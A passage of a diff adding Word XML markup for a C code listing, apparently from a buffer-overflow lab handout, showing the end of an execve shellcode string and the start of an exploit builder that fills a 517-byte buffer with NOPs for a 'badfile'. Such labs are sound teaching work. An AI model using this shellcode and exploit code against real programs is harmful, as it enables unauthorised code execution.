+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\xb0\x0b"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Line 10: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>movb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $0x0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>b,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>al */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>xcd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>\x80"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* Line 11: int $0x80 */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>void</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>main</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>argc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>**</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>argv</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="8000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>FILE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* Initialize buffer with 0x90 (NOP instruction) */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>memset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>&amp;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>0x90</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
